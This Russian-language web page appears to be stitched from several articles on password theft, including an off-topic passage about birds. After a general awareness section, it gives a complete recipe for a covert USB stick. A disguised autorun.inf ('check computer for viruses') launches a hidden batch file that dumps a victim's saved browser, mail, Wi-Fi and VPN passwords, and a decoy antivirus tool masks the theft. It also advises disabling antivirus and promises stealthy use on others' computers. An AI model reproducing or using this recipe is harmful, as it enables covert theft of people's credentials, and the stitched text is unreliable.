Как украсть все пароли. Как воруют пароли

Всем доброго времени суток. Закончились предновогодние авралы и зимние каникулы и пора уже что-нибудь написать в блог. Первую запись в этом году я хочу посвятить ликбезу по методам кражи паролей в противовес одной из предыдущих публикаций: Когда вас «взломали» не обязательно бежать менять все пароли . Сразу стоит уточнить, что материал направлен на неспециалистов по защите информации и носит ознакомительный характер. Хотя, возможно, специалисты тоже подчерпнут для себя что-то новое.

Как бы все не ненавидели пароли, это по сей день остается наиболее популярным средством идентификации, но, к сожалению, иногда у нас их крадут. Частично проблему помогает решить двухфакторная аутентификация, но лишь частично и лишь для наиболее критичных сервисов.

По статистике наиболее распространенными причинами потери контроля над аккаунтами становятся две вещи: использование простых (словарных) паролей и социальная инженерия. В этой статье я расскажу об основных методах взлома паролей естественно с целью повышения осведомленности в этом вопросе у широкой аудитории (использование материалов в деструктивных целях карается законом, автор ответственности не несет и прочее бла-бла-бла).

  1. Угадывание

Да, все так просто. Ваш пароль могут тупо угадать. Помните все эти эпизоды в голливудских фильмах, когда герои взламывают чей-то компьютер и в качестве пароля пробуют имена детей, бабушек, дедушек, дядь, теть, клички домашних животных жертвы и т. д.? Так вот, это действительно один из действенных способов взлома и этот архаичный метод эффективен до сих пор. Ведь сейчас все публикуют тонны информации о себе в социальных сетях и если пароль основан на каких-то данных, связанных с личностью владельца взламываемого аккаунта, то подбор пароля - дело времени (это как раз является причиной того, почему пароли нужно периодически менять).

Противодействие методу: в общем, надеюсь, вы поняли, что «tanyushka1990» - это плохой пароль, даже если Танюшка это не вы, а ваша любимая внучка. Используйте не угадываемые интуитивно пароли. Периодически (не реже раза в год) меняйте пароли хотя бы к критичным аккаунтам.

  1. Социальная инженерия

Социальная инженерия понятие достаточно широкое. Социальный инженер может взаимодействовать с жертвой как лично, так и по телефону, но чаще всего взаимодействует по электронным каналам связи - мессенджеры, соцсети, электронная почта. И здесь мы не будем рассматривать методы социнженерии как таковые, тут я лучше посоветую почитать классику жанра - книгу В. Саймона и К. Митника «Искусство обмана». Здесь нам важно то, что методы социальной инженерии в плане кражи паролей направлены на то, чтобы заставить жертву саму отдать свой пароль. Один из примеров выглядит так: злоумышленник представляется новым системным администратором и говорит сотруднику вашей организации, что ему нужен пароль от электронной почты этого сотрудника для проведения каких-нибудь сферических вакуумных тестов. Другой пример, когда личный контакт злоумышленника с жертвой отсутствует: веерная рассылка с фишинговой ссылкой и тревожным сообщением (например, на ваш аккаунт нажаловались, его заблокировали и вам «нужно» пройти по ссылке для разблокировки). Фишинговая ссылка ведет на страницу, заранее подготовленную злоумышленником и один в один похожую на страницу авторизации какого-нибудь популярного сервиса, например: vk.com, gmail.com, facebook.com и т. д. Что происходит дальше: жертва, думая, что это легальный сервис, вводит свой логин и пароль, эти идентификационные данные отправляются злоумышленнику, выдается сообщение об ошибке (ну кто из нас никогда не ошибался при вводе пароля? всякое бывает!) и далее пользователь перенаправляется на настоящую страницу авторизации, ведь грязное дело уже сделано и жертву нет смысла держать на поддельной странице. Кстати, если кто-то еще не знает, почему Windows просит нажать сочетание клавиш Alt-Ctrl-Del перед входом в систему, настоятельно советую загуглить и почитать.

Противодействие методу: обычно на предприятиях используются гибридные методы противодействия социальной инженерии (на тех предприятиях естественно, где вообще озаботились вопросами защиты информации), но нужно понимать, что поскольку социальный инженер может провзаимодействовать с жертвой и без использования каких-либо каналов связи (и, соответственно отфильтровать, заблокировать, отследить его сообщения мы не сможем), то единственным действительно эффективным методом противодействия является информирование сотрудников (ну, или себя самого, если речь идет о личной безопасности) о методах социальной инженерии. Ведь в наши дни мало кто поведется на наследство нигерийского принца или на развод «Мама, закинь денег на номер ХХХХ. Потом объясню», а ведь когда-то эти методы работали.

  1. Подглядывание

Здесь только вскользь упомяну о таких очевидных вещах, как о паролях на стикерах, которые приклеены к монитору или на бумажках под клавиатурой. Под подглядыванием здесь можно понимать и подглядывание процесса набора пароля. То есть пароль лучше вводить, когда за процессом никто не наблюдает. Есть люди с интересными способностями. Например, один мой знакомый поспорил со мной, что посмотрит, как я ввожу пароль на ноутбуке, а потом повторит ввод этого пароля сам. И действительно повторил. Я очень удивился, так как владею слепым десятипальцевым набором и могу ввести свой пароль очень быстро. Оказалось, что у знакомого какая-то особенная фотографическая память. Опасный человек =)

То есть подглядывание помогает злоумышленнику быстро получить готовый пароль и не прибегать к другим более сложным или ресурсоемким техникам, о которых речь пойдет далее. Но подглядывание пароля «глазами» это не единственный способ. Например, если вы вводили свой пароль на чужом компьютере и случайно сохранили пароль, вышли из аккаунта, но не очистили данные, то кто-то другой может не только войти в аккаунт не зная пароля (это еще полбеды), но и выудить этот пароль в явном виде, вставив в адресную строку браузера на странице где введен логин и пароль (замаскирован звездочками) вот такой простой скрипт:

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j

[свернуть]

Если пароль используется на других аккаунтах, то злоумышленник может получить доступ и к ним тоже. Вот поэтому специалисты по безопасности категорически не рекомендуют использовать один и тот же пароль для разных аккаунтов.

Противодействие методу: не вводите пароль, когда кто-то стоит рядом и смотрит на ваши руки. Не вводите пароль на недоверенных устройствах. Если все же пришлось, позаботьтесь об очистке информации о паролях и cookies. К тому же на недоверенных устройствах могут быть установлены кейлоггеры .

  1. Подбор паролей по словарям

Мы плавно перешли от интуитивных и мошеннических техник угона паролей к техническим. Первая из них это подбор паролей по словарям. Пожалуй, даже неспециалисты в области информационной безопасности слышали из новостей о крупных утечках паролей к почтовым ящикам на разных почтовых сервисах. Как потом выяснилось большинство из этих утечек было связано не со взломами серверов поставщика услуг, а с банальным подбором паролей к почтовым ящикам по словарям. Большинство паролей «взломанных» почтовых ящиков представляли из себя комбинации типа «123456», «qwerty» и тому подобные. В разделе «Материалы» я выложил парочку словарей с паролями (их можно пополнять самостоятельно), которые можно использовать как в различных инструментах типа John the Ripper или Hydra , либо для проверки банальным поиском есть ли в словаре ваш пароль. Если есть, то срочно меняем!

Противодействие методу: использование сложных, не словарных паролей.

  1. Брутфорс

Название метода происходит от двух английских слов: brute - грубая и force - сила. Из названия интуитивно понятно, чем этот метод отличается от предыдущего - здесь просто перебираются все возможные комбинации пароля. Метод затратен по времени и по ресурсам, ведь для подбора таким методом нужны немалые вычислительные ресурсы. Поэтому к такому методу злоумышленники прибегают только в крайних случаях. Уменьшить время подбора может позволить, например, знание точной длины пароля или знание того, что в пароле точно нет специальных символов и цифр. Таким образом, сокращается количество возможных комбинаций.

Противодействие методу: использование длинных хаотичных паролей и периодическая смена паролей.

  1. Радужные таблицы

Все кому в последние годы приходилось восстанавливать пароль к какому-либо сервису должны были заметить, что если раньше некоторые сервисы просто присылали вам ваш пароль на электронную почту, то теперь вам нужно сразу же придумать новый пароль. Это связано с тем, что ни один уважающий себя сервис не хранит пароли в открытом виде. Хранятся пароли в виде хешей. Если коротко, то хешем называется результат преобразования текста (в нашем случае - пароля) некой необратимой математической функцией. Результат преобразования распространенным алгоритмом MD5 слова «password» (без кавычек) выглядит следующим образом:. Примерно в таком виде и хранятся наши пароли у провайдеров услуг, и поскольку считается, что функции необратимые, то сами провайдеры вроде как не могут знать наш пароль и выслать нам его в открытом виде. Подробнее о хешировании можно почитать .

Радужные таблицы, если очень грубо говорить позволяют восстановить пароль по хэшу. Полный процесс конечно гораздо сложнее, чем кажется. Поэтому, кому интересно ознакомиться с технологией подробнее, можно начать со страницы в википедии . Казалось бы, что с помощью радужных таблиц можно было бы взломать почти любой пароль, но и тут есть свои сложности для злоумышленника. Если при брутфорсе нужны временные и ресурсные затраты на сам перебор, то в случае радужных таблиц то же самое нужно для генерации этих самых таблиц. При этом любой набор радужных таблиц будет иметь множество ограничений, к ним относятся: ограничение на длину пароля, ограничение на набор символов, ограничение на конкретный алгоритм хэширования. В сети в общем доступе можно найти радужные таблицы для подбора паролей не длиннее 6 символов, которые содержат только буквы английского алфавита обоих регистров, но без спецсимволов и цифр. Но вот уже за что-то посерьезнее просят денег.

Противодействие методу: засолка хешей. К сожалению, данный вид противодействия доступен только на уровне администраторов сервисов и никак не зависит от действий конечного пользователя.

  1. Гибридные методы

Под гибридными методами понимается сочетание различных методов, приведенных выше, в совокупности. На самом деле, пример использования методов «брутфорс» + «подглядывание» уже был приведен выше. Например, злоумышленник может подсмотреть не пароль целиком, а лишь символы, из которых состоит пароль. Это позволит ему в параметрах при брутфорсе указать только нужные символы, а все остальные исключить из перебора, тем самым существенно сократив количество возможных комбинаций.

Еще один пример гибридного метода: берется словарное слово и в нем делаются замены букв на спецсимволы. Например, берется словарный пароль «password» и пробуются комбинации «password123», «p@ssword», «pa$$w0rd» и т. д.

Противодействие гибридным методам заключается в использовании всех методик противодействия, приведенных выше.



реальным тюремным сроком!

Попробуем разобраться, как можно украсть пароли с компьютера, если у вас есть доступ к нему, но так чтобы жертва ничего не заподозрила.

Один из способов – создать специальную флэшку с утилитами, которые смогут вытащить пароли из браузеров и других программ, сохраняющих пароли для удобства пользователя.

Скачаем Password Recovery утилиты, которые нам потребуются:

* MessenPass - восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger (In Windows XP), Windows Live Messenger (In Windows XP And Vista), Yahoo Messenger (Version 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda, and GAIM;

* Mail PassView - извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000 (POP3/SMTP Accounts only), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, and Web-based email accounts;

* IE Passview - отображает логины и пароли, сохраненные "осликом";

* ChromePass - отображает логины и пароли, сохраненные браузером Google Chrom;

* PasswordFox - получает все пароли, сохраненные Firefox"oм;

* Protected Storage PassView - восстанавливает все пароли, сохраненные в защищенном хранилище;

* Dialupass - вытаскивает все пароли dialup/VPN сессий;

* Network Password Recovery - отображает пароли которые вы используете для шар в локальной сети а так же пароли.NET Passport/Messenger account;

* PstPassword - извлекает пароли из файлов личных папок Outlook - .PST;

* WirelessKeyView - восстанавливает все ключи беспроводных сетей (WEP/WPA), которые хранятся на вашем компьютере.

Еще существует утилитка OperaPassView, но она пока не поддерживает командную строку. Поэтому ее не включаем в наш набор.
Все утилиты можно взять .

Еще нам необходима утилитка Hidden Start ().

Так же скачаем для того чтобы замаскировать наши утилиты. Его мы будем запускать в конце операции "тырения" паролей. И только его работу будет видеть жертва на своем экране.

Подготавливаем флэшку.

1. Создаем на флэшке две папки:
флэшка:\prog\
флэшка:\prog\log\

2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe

3. В корне флешки создаем autorun.inf со следующим содержанием:


open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Проверить комп на вирусы


Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.

4. Создаем батник launch.bat:

echo off
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/netpass.exe /stext prog/log/%computername%_netpass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
start prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt

If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe

Рассмотрим команды батника поподробнее:

echo off – запрет на вывод в окно CMD результатов выполнения

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt

Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.

start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского

Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.

Как же бороться?

1. Не сохраняйте пароли – лучше пользоваться какой-нибудь программкой типа Password Keeper или eWallet.

3. Наличие нормального антивируса обязательно! Хотя он и ругнется только на несколько этих утилит.

Поводом для написания этой статьи стала заметка в журнале "Хакер".

Данная статья написана исключительно в ознакомительных целях.
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!

Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!

На какие только ухищрения не идут злоумышленники, чтобы выкрасть у пользователя пароли к всевозможным сетевым ресурсам — страничкам в соцсетях, играм-онлайн, платёжным системам. Статистика кражи личных данных в сети пестрит тревожными цифрами. Чтобы не оказаться в числе жертв, потерявших свои аккаунты, давайте рассмотрим основные методы воровства паролей, которые используют хакеры — , и . Имея представление об этих зловредных «технологиях», им можно достаточно эффективно противостоять, соблюдая должный уровень безопасности и конфиденциальности личных данных.

Торжество справедливости и отмщения наступает в период кормёжки. Птенчики малюры, завидев приближающихся к гнезду родителей с вкусняшками в клюве, начинают, что есть силы трезвонить, ту самую трель, которую их научили петь в первые дни жизни. Получают еду, только исполнители «родного мотива» — законные наследники, а птенцы кукушки остаются ни с чем и вскоре умирают от голода.

На первый взгляд животрепещущая картина природы, но как она похожа на бескрайние просторы цифровых джунглей Интернета: и тут есть пароли; и тут есть персонажи — злые и добрые — хакеры и обычные пользователи.

Итак, уважаемый читатель, чтобы сберечь свои заветные логины и пароли, от подлых людишек, конечно трели вам разучивать не придётся. Но вот ознакомиться со способами похищения личных данных, совсем не будет лишним... Хотите мира? Готовьтесь к войне!

Главные орудия злоумышленника в этом способе - наивность и чрезмерное любопытство пользователя. Никаких изощрённых программных методов, коварных вирусов и прочих хакерских технологий.

Злодей, зная только логин от почтового ящика, вводит его в форму входа на сервис. А затем сообщает системе, что забыл пароль. На мониторе высвечивается контрольный вопрос — взломщик не знает на него ответ, но уже знает его содержание. Вот тут-то и начинается самое «интересное»: на основе темы вопроса он отправляет жертве «хитрое письмо», в котором в завуалированной форме пытается выведать правильный ответ. Коварное послание может выглядеть примерно так: «Добрый день! Мы, кулинарный сайт такой-то, ..... и т.д. А какое ваше любимое блюдо?» И это лишь отдельный пример. Ухищрений такого рода «гуляет по сети» великое мн ожество . Подробнее о социальной инженерии мы писали статье. Так что смотрите в оба, читая письма!

Кража куки (cookie)

Куки (от англ. «cookie» — печенье) — файл с данными сессии, которые веб-сайт сохраняет в браузере пользователя. В нём, в захешированном виде, хранятся логин, пароль, id и прочая информация, к которой в процессе онлайн-работы периодически обращается ресурс.

Хакер, зная уязвимости конкретного сайта (форум, почтовый сервис, соцсеть), пишет специальный скрипт, который «вытягивает» куки из браузера жертвы и отправляет ему. Без участия владельца аккаунта, это «чёрное дело» не обходится, так как именно он должен запустить зловредный скрипт. Поэтому код, перед отправкой, оборачивается в специальную «приманку»: в картинку, завлекающее письмо, просьбу и т.д. Главная задача — чтобы жертва перешла по предложенной ссылке. И если это всё-таки случается, хакерский скрипт куки из браузера передаёт снифферу (перехватчику сетевого трафика), установленному на стороннем хостинге. И только потом направляет пользователя, куда ему было обещано в сообшении — на сайт знакомств, видеохостинг, фотогалерею и пр. Естественно, владелец аккаунта об этих манипуляциях ничего не подозревает — вероломная процедура занимает всего 5 секунд.

Чтобы оставить взломщика, использующего брутфорс, с носом, создавайте сложные пароли, пользуйтесь .

Как украсть пароли из windows .

Всем привет, сегодня позволю себе “зацепить” ещё одну тему, которая будет, как мне кажется, интересна многим. Мы создадим специальный инструмент, который позволит нам отобразить и сохранить все пароли, которые сохранены в windows. В вашей или чужой. Проще говоря, украсть пароли .

Разовьём тему. Какими браузерами вы пользуетесь? Сколько их в windows ? Глупый вопрос: вы пользуетесь социальными сетями? Другими социальными проектами? У каждого из нас таких ресурсов не мало. Каждый из них требует пароля, который хранится в этом же браузере. Это удобно. Но не безопасно, и сейчас вы увидите почему. Есть утилиты, которые позволят украсть пароли из браузеров любых мастей для сайтов.

Забыли пароль к роутеру? Или у вас отдельный кабель? Никакой разницы – утилита в составе пакета позволит украсть пароли к интернету . Вы приобрели Windows честно за свои кровные? Она была установлена вместе с купленным компьютером и ноутбуком? А ведь всякий раз при выходе в сеть Windows сверяется с базой на предмет результатов проведённой . Уникальный ключ активации Windows – обязательное условие проверки подлинности. Где он хранится, мы тоже поговорим. Есть утилита, которая позволит украсть ключи и пароли к системе . Там же будет и ключ к пакету Microsoft Office…

как на ладони…

Почтовые клиенты на компьютере имеются? Microsoft Outlook, Filezilla, Mozilla Thunderburd ? При входе в почту почтовый клиент отправляет пароли к почтовым ящикам на сервера почтовых серверов… Есть утилита, которая позволит украсть пароли к почтовым ящикам .

Сейчас я вам покажу, как можно будет выдернуть самое сокровенное из windows всего в пару кликов мышью.

И пароли даже удалённых программ и браузеров в любом виде.

Как украсть пароли из windows?

Мы будем пользоваться программами от NirSoft. У разработчиков немало “полезных” утилит. Мы рассмотрим сейчас те из них, что помогут нам в конкретных задачах. Все представленные программы имеют портативную версию, установки не потребуют. На сайте производителя вы можете скачать и файлы русификации, однако для того, чтобы украсть пароли из системы , они не очень важны.

Для того, чтобы ” украсть пароли ” из windows, нам понадобятся:

  • свободная флешка (её можно будет использовать по прямому назначению и после того, как она будет “заточена” под выуживание паролей);
  • сборник собственно программ (вы можете скачать его прямо с моего сайта)
  • пару манипуляций с документами Блокнота.
  • Половина из таких программ определяется как “зловред” ещё на стадии скачивания браузером. Что уж про антивирусы говорить… Так что перед использованием созданного вами инструмента антивирус придётся ОТКЛЮЧИТЬ.
  • запуск некоторых утилит потребует прав администратора

ГАРАНТИРУЮ, ЧТО В СКАЧИВАЕМОЙ СБОРКЕ ВИРУСОВ НЕТ. ОДНАКО ХАРАКТЕР ДЕЙСТВИЯ ПРОГРАММ ПОХОЖ НА ДЕЙСТВИЯ СНИФЕРОВ. ТАК ЧТО АНТИВИРУС НЕ РАЗ СООБЩИТ О “ПРОБЛЕМАХ”.

Начинаем работу.

  • Отключим антивирус. Временно.
  • . Он запакован мною дважды, чтобы хоть немного потянуть время и не попасть под “бан” поисковых систем, которые подобные программы недолюбливают. Пароль к архиву

computer76

  • Готовим нашу флешку. Да готовить нечего, места потребуется мало. Почему флешка? Она портативна, порой мала в размерах и даже незаметна. Ваши манипуляции могут остаться незаметными даже для жертвы, которая должна отлучиться на кухню попить кофейку.
  • Распакуйте программы на флешку. Не в какую-нибудь папку, а по прямому пути, чтобы они были доступны при открытии флешки. Распакованные утилиты скопом будет запускать bat файл с именем start .

Этот bat файл создан в обычном Блокноте. , читайте здесь. В документ внесён код автоматического запуска утилит и сохранения их в соответствующие текстовые файлы. Вы можете его переименовать и просмотреть его состав с помощью того же Блокнота.

После запуска батника каждая из программ откроется в отдельном окне со всеми вашими (или чужими) паролями и/или попробует создать текстовый файл, в котором будут отображены найденные пароли Opera , Firefox , Internet Explorer , почтовых клиентов и самой Windows . Всё займёт несколько секунд. Потренируйтесь на своём компьютере не спеша.

Как правильно, быстро и максимально незаметно использовать приобретённые навыки на чужом компьютере, рассмотрим в одной из следующих статей.

Прочитано: 321

Поделиться